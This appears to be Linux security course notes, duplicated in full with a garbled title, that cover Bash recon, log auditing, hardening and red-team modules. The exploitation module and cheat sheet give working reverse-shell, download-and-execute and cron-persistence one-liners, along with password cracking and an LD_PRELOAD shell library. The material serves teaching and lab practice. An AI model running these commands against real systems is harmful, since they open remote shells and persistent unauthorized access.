Bash for Linux Security

Target Audience: Linux Admins, Blue Teamers, Pentesters, DevSecOps, Red Teamers Prerequisites: Kali/Ubuntu, Bash shell, basic Linux Tools: Kali Linux, sudo, nano, tmux, Sysdig, Auditd Ethical Use Only: Authorized systems only (labs, CTFs, enterprise with consent)

Bash for Linux Security

Bash for LinMaster Bash to Secure, Audit, Exploit & Respond on Linux Systemsux Security

Bash for Linux Security: Complete Course Notes

Master Bash to Secure, Audit, Exploit & Respond on Linux Systems

COURSE OVERVIEW

Target Audience: Linux Admins, Blue Teamers, Pentesters, DevSecOps, Red Teamers
Prerequisites: Kali/Ubuntu, Bash shell, basic Linux
Tools: Kali Linux, sudo, nano, tmux, Sysdig, Auditd
Ethical Use Only: Authorized systems only (labs, CTFs, enterprise with consent)

WHY BASH FOR LINUX SECURITY?

Feature Security Advantage
Native No install needed
Pipeline (|) Chain tools: ps | grep | awk
Cron + Signals Automation & persistence
File descriptors Redirect logs, hide output
sudo + setuid Privilege escalation paths
Auditd + Syscalls Deep system monitoring

MODULE 1: BASH BASICS FOR SECURITY

Key Commands

# Recon
whoami; id; uname -a; lsb_release -a
ps aux | grep -v grep | grep ssh
netstat -tulnp | grep LISTEN

# File Ops
find / -perm -4000 2>/dev/null    # SUID binaries
ls -la /etc/shadow /etc/passwd
cat /proc/cpuinfo | grep model

# Output
echo "[+] Found" >&2               # stderr
printf "Scan complete\n"

Hands-On: System Recon Script

#!/bin/bash
# recon.sh
echo "=== Linux Recon ===" | tee recon_$(date +%F).log

echo "[*] Host: $(hostname)"
echo "[*] Kernel: $(uname -r)"
echo "[*] Uptime: $(uptime -p)"

echo "[*] Users with UID 0:"
awk -F: '$3 == 0 {print $1}' /etc/passwd

echo "[*] SUID Files:"
find / -perm -4000 2>/dev/null | head -10

echo "[*] Open Ports:"
ss -tulnp | grep LISTEN

Run: chmod +x recon.sh; sudo ./recon.sh

MODULE 2: SYSTEM AUDITING & FORENSICS

2.1 Log Analysis

# Failed logins
grep "Failed password" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr

# SSH brute force
journalctl _COMM=sshd | grep "Failed" | tail -20

2.2 File Integrity (Tripwire-like)

# Baseline
find /etc -type f -exec sha256sum {} \; > baseline.hash

# Verify
sha256sum -c baseline.hash | grep -v "OK"

2.3 Process & Network Monitoring

# Suspicious processes
ps aux | grep -vE "(systemd|dbus|kthreadd)" | grep -E "(stratum|miner)"

# Real-time net connections
watch -n 1 "ss -tulnp | grep ESTAB"

MODULE 3: USER & PERMISSION HARDENING

3.1 Find Weak Permissions

# World-writable files
find / -xdev -type f -perm -002 2>/dev/null

# .ssh keys with bad perms
find ~ -name "id_*" ! -perm 600

3.2 Password Auditing

# Crack with John (install: sudo apt install john)
unshadow /etc/passwd /etc/shadow > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

3.3 Sudo Misconfigs

sudo -l | grep "(ALL)"
# Exploit: sudo vim → :!/bin/sh

MODULE 4: NETWORK SECURITY & SCANNING

4.1 Port Scanner

#!/bin/bash
target=$1
for port in {1..1000}; do
    timeout 1 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null && echo "[+] $port OPEN"
done

4.2 Banner Grabbing

for port in 22 80 443; do
    echo -e "HEAD / HTTP/1.0\r\n\r\n" | nc -w 3 $1 $port
done

4.3 iptables Firewall Rules

# List rules
iptables -L -n -v

# Block all but SSH
iptables -F
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -j DROP

MODULE 5: EXPLOITATION & POST-EXPLOITATION (RED TEAM)

WARNING: Use only in authorized labs

5.1 Reverse Shell (One-Liner)

# Attacker: nc -lvnp 4444
# Victim:
bash -i >& /dev/tcp/192.168.1.10/4444 0>&1

5.2 Download & Execute

curl -s http://192.168.1.10/evil.sh | bash
# or
wget -qO- http://192.168.1.10/evil.sh | bash

5.3 Cron Persistence

# Add reverse shell every minute
(crontab -l; echo "* * * * * bash -i >& /dev/tcp/192.168.1.10/4444 0>&1") | crontab -

MODULE 6: DEFENSIVE SCRIPTING & HARDENING

6.1 Enable Auditd

sudo apt install auditd
sudo systemctl enable auditd

# Monitor sudo
echo -e "\n-w /usr/bin/sudo -p x -k sudo\n" >> /etc/audit/audit.rules
sudo systemctl restart auditd

6.2 AppArmor / SELinux

# Check status
aa-status
sestatus

# Enforce
aa-enforce /etc/apparmor.d/*

6.3 Fail2Ban Setup

sudo apt install fail2ban
cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
systemctl enable fail2ban

MODULE 7: AUTOMATION & TOOLING

7.1 Auto-Recon Framework

#!/bin/bash
# auto_recon.sh
target=$1
mkdir -p "recon/$target"

# Full chain
sudo nmap -A -oX "recon/$target/nmap.xml" $target
nikto -h $target -output "recon/$target/nikto.txt"
gobuster dir -u http://$target -w /usr/share/wordlists/dirb/common.txt -o "recon/$target/gobuster.txt"

echo "Recon saved to recon/$target"

7.2 Incident Response Playbook

#!/bin/bash
# ir_playbook.sh
case="IR_$(date +%F_%H%M)"
mkdir "/tmp/$case"

# Collect volatile data
who > "/tmp/$case/who.txt"
ps aux > "/tmp/$case/ps.txt"
ss -tulnp > "/tmp/$case/netstat.txt"
dmesg > "/tmp/$case/dmesg.txt"

echo "IR Data in /tmp/$case"

MODULE 8: ADVANCED TOPICS

8.1 Linux Capabilities

getcap -r / 2>/dev/null | grep -v "cap_sys"
# Exploit: ping with cap_net_raw

8.2 LD_PRELOAD Rootkit (Conceptual)

// malicious.c
__attribute__((constructor)) void init() {
    system("/bin/sh");
}
# Compile: gcc -shared -fPIC -o malicious.so malicious.c
# Run: LD_PRELOAD=./malicious.so /bin/ls

8.3 eBPF Monitoring (Modern)

# Install bcc-tools
sudo apt install bpfcc-tools
sudo opensnoop-bpfcc | grep passwd

CAPSTONE PROJECT: LINUX SECURITY TOOLKIT

#!/bin/bash
# linsec_toolkit.sh
show_menu() {
    clear
    echo "=== Linux Security Toolkit ==="
    echo "1. System Recon"
    echo "2. Audit Logs"
    echo "3. Port Scan"
    echo "4. Harden System"
    echo "5. Exit"
}

while true; do
    show_menu
    read -p "Choose: " choice
    case $choice in
        1) ./modules/recon.sh ;;
        2) ./modules/audit.sh ;;
        3) ./modules/scan.sh ;;
        4) ./modules/harden.sh ;;
        5) exit 0 ;;
    esac
    read -p "Press Enter to continue..."
done

RESOURCES & PRACTICE

Platform Focus
TryHackMe "Linux Fundamentals", "Bash Scripting"
Hack The Box Linux machines
OverTheWire Bandit (Bash challenges)
Root-Me Shellcoding, privilege escalation
Pwnable.kr Linux exploitation

CHEAT SHEET (One-Page)

# Recon
id; uname -a; cat /etc/os-release
find / -perm -4000 2>/dev/null

# Logs
journalctl, dmesg, /var/log/auth.log
grep "Failed" /var/log/secure

# Network
ss -tulnp, nc -z, curl -I
iptables -L -n

# Defense
auditctl -w /etc/passwd -p wa
aa-enforce /etc/apparmor.d/*

# Red Team
bash -i >& /dev/tcp/IP/PORT 0>&1
(crontab -l; echo "* * * * * /bin/sh -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'") | crontab -

FINAL TIPS

  1. Enable Auditd + Sysdig for full visibility
  2. Use set -euo pipefail in scripts
  3. Never run untrusted scripts as root
  4. Monitor /tmp, /dev/shm, cron jobs
  5. Practice in Labs: Metasploitable2, VulnHub

Want PDF, Notion Template, or Video Walkthroughs?
Need CTF Writeups or Exploit Templates?
Just ask — I’ll generate them!

Stay Ethical. Stay Rooted. Secure Linux.

Last updated: Nov 10, 2025

Bash for Linux Security

Target Audience: Linux Admins, Blue Teamers, Pentesters, DevSecOps, Red Teamers Prerequisites: Kali/Ubuntu, Bash shell, basic Linux Tools: Kali Linux, sudo, nano, tmux, Sysdig, Auditd Ethical Use Only: Authorized systems only (labs, CTFs, enterprise with consent)

Bash for Linux Security

Bash for LinMaster Bash to Secure, Audit, Exploit & Respond on Linux Systemsux Security

Bash for Linux Security: Complete Course Notes

Master Bash to Secure, Audit, Exploit & Respond on Linux Systems

COURSE OVERVIEW

Target Audience: Linux Admins, Blue Teamers, Pentesters, DevSecOps, Red Teamers
Prerequisites: Kali/Ubuntu, Bash shell, basic Linux
Tools: Kali Linux, sudo, nano, tmux, Sysdig, Auditd
Ethical Use Only: Authorized systems only (labs, CTFs, enterprise with consent)

WHY BASH FOR LINUX SECURITY?

Feature Security Advantage
Native No install needed
Pipeline (|) Chain tools: ps | grep | awk
Cron + Signals Automation & persistence
File descriptors Redirect logs, hide output
sudo + setuid Privilege escalation paths
Auditd + Syscalls Deep system monitoring

MODULE 1: BASH BASICS FOR SECURITY

Key Commands

# Recon
whoami; id; uname -a; lsb_release -a
ps aux | grep -v grep | grep ssh
netstat -tulnp | grep LISTEN

# File Ops
find / -perm -4000 2>/dev/null    # SUID binaries
ls -la /etc/shadow /etc/passwd
cat /proc/cpuinfo | grep model

# Output
echo "[+] Found" >&2               # stderr
printf "Scan complete\n"

Hands-On: System Recon Script

#!/bin/bash
# recon.sh
echo "=== Linux Recon ===" | tee recon_$(date +%F).log

echo "[*] Host: $(hostname)"
echo "[*] Kernel: $(uname -r)"
echo "[*] Uptime: $(uptime -p)"

echo "[*] Users with UID 0:"
awk -F: '$3 == 0 {print $1}' /etc/passwd

echo "[*] SUID Files:"
find / -perm -4000 2>/dev/null | head -10

echo "[*] Open Ports:"
ss -tulnp | grep LISTEN

Run: chmod +x recon.sh; sudo ./recon.sh

MODULE 2: SYSTEM AUDITING & FORENSICS

2.1 Log Analysis

# Failed logins
grep "Failed password" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr

# SSH brute force
journalctl _COMM=sshd | grep "Failed" | tail -20

2.2 File Integrity (Tripwire-like)

# Baseline
find /etc -type f -exec sha256sum {} \; > baseline.hash

# Verify
sha256sum -c baseline.hash | grep -v "OK"

2.3 Process & Network Monitoring

# Suspicious processes
ps aux | grep -vE "(systemd|dbus|kthreadd)" | grep -E "(stratum|miner)"

# Real-time net connections
watch -n 1 "ss -tulnp | grep ESTAB"

MODULE 3: USER & PERMISSION HARDENING

3.1 Find Weak Permissions

# World-writable files
find / -xdev -type f -perm -002 2>/dev/null

# .ssh keys with bad perms
find ~ -name "id_*" ! -perm 600

3.2 Password Auditing

# Crack with John (install: sudo apt install john)
unshadow /etc/passwd /etc/shadow > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

3.3 Sudo Misconfigs

sudo -l | grep "(ALL)"
# Exploit: sudo vim → :!/bin/sh

MODULE 4: NETWORK SECURITY & SCANNING

4.1 Port Scanner

#!/bin/bash
target=$1
for port in {1..1000}; do
    timeout 1 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null && echo "[+] $port OPEN"
done

4.2 Banner Grabbing

for port in 22 80 443; do
    echo -e "HEAD / HTTP/1.0\r\n\r\n" | nc -w 3 $1 $port
done

4.3 iptables Firewall Rules

# List rules
iptables -L -n -v

# Block all but SSH
iptables -F
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -j DROP

MODULE 5: EXPLOITATION & POST-EXPLOITATION (RED TEAM)

WARNING: Use only in authorized labs

5.1 Reverse Shell (One-Liner)

# Attacker: nc -lvnp 4444
# Victim:
bash -i >& /dev/tcp/192.168.1.10/4444 0>&1

5.2 Download & Execute

curl -s http://192.168.1.10/evil.sh | bash
# or
wget -qO- http://192.168.1.10/evil.sh | bash

5.3 Cron Persistence

# Add reverse shell every minute
(crontab -l; echo "* * * * * bash -i >& /dev/tcp/192.168.1.10/4444 0>&1") | crontab -

MODULE 6: DEFENSIVE SCRIPTING & HARDENING

6.1 Enable Auditd

sudo apt install auditd
sudo systemctl enable auditd

# Monitor sudo
echo -e "\n-w /usr/bin/sudo -p x -k sudo\n" >> /etc/audit/audit.rules
sudo systemctl restart auditd

6.2 AppArmor / SELinux

# Check status
aa-status
sestatus

# Enforce
aa-enforce /etc/apparmor.d/*

6.3 Fail2Ban Setup

sudo apt install fail2ban
cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
systemctl enable fail2ban

MODULE 7: AUTOMATION & TOOLING

7.1 Auto-Recon Framework

#!/bin/bash
# auto_recon.sh
target=$1
mkdir -p "recon/$target"

# Full chain
sudo nmap -A -oX "recon/$target/nmap.xml" $target
nikto -h $target -output "recon/$target/nikto.txt"
gobuster dir -u http://$target -w /usr/share/wordlists/dirb/common.txt -o "recon/$target/gobuster.txt"

echo "Recon saved to recon/$target"

7.2 Incident Response Playbook

#!/bin/bash
# ir_playbook.sh
case="IR_$(date +%F_%H%M)"
mkdir "/tmp/$case"

# Collect volatile data
who > "/tmp/$case/who.txt"
ps aux > "/tmp/$case/ps.txt"
ss -tulnp > "/tmp/$case/netstat.txt"
dmesg > "/tmp/$case/dmesg.txt"

echo "IR Data in /tmp/$case"

MODULE 8: ADVANCED TOPICS

8.1 Linux Capabilities

getcap -r / 2>/dev/null | grep -v "cap_sys"
# Exploit: ping with cap_net_raw

8.2 LD_PRELOAD Rootkit (Conceptual)

// malicious.c
__attribute__((constructor)) void init() {
    system("/bin/sh");
}
# Compile: gcc -shared -fPIC -o malicious.so malicious.c
# Run: LD_PRELOAD=./malicious.so /bin/ls

8.3 eBPF Monitoring (Modern)

# Install bcc-tools
sudo apt install bpfcc-tools
sudo opensnoop-bpfcc | grep passwd

CAPSTONE PROJECT: LINUX SECURITY TOOLKIT

#!/bin/bash
# linsec_toolkit.sh
show_menu() {
    clear
    echo "=== Linux Security Toolkit ==="
    echo "1. System Recon"
    echo "2. Audit Logs"
    echo "3. Port Scan"
    echo "4. Harden System"
    echo "5. Exit"
}

while true; do
    show_menu
    read -p "Choose: " choice
    case $choice in
        1) ./modules/recon.sh ;;
        2) ./modules/audit.sh ;;
        3) ./modules/scan.sh ;;
        4) ./modules/harden.sh ;;
        5) exit 0 ;;
    esac
    read -p "Press Enter to continue..."
done

RESOURCES & PRACTICE

Platform Focus
TryHackMe "Linux Fundamentals", "Bash Scripting"
Hack The Box Linux machines
OverTheWire Bandit (Bash challenges)
Root-Me Shellcoding, privilege escalation
Pwnable.kr Linux exploitation

CHEAT SHEET (One-Page)

# Recon
id; uname -a; cat /etc/os-release
find / -perm -4000 2>/dev/null

# Logs
journalctl, dmesg, /var/log/auth.log
grep "Failed" /var/log/secure

# Network
ss -tulnp, nc -z, curl -I
iptables -L -n

# Defense
auditctl -w /etc/passwd -p wa
aa-enforce /etc/apparmor.d/*

# Red Team
bash -i >& /dev/tcp/IP/PORT 0>&1
(crontab -l; echo "* * * * * /bin/sh -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'") | crontab -

FINAL TIPS

  1. Enable Auditd + Sysdig for full visibility
  2. Use set -euo pipefail in scripts
  3. Never run untrusted scripts as root
  4. Monitor /tmp, /dev/shm, cron jobs
  5. Practice in Labs: Metasploitable2, VulnHub

Want PDF, Notion Template, or Video Walkthroughs?
Need CTF Writeups or Exploit Templates?
Just ask — I’ll generate them!

Stay Ethical. Stay Rooted. Secure Linux.

Last updated: Nov 10, 2025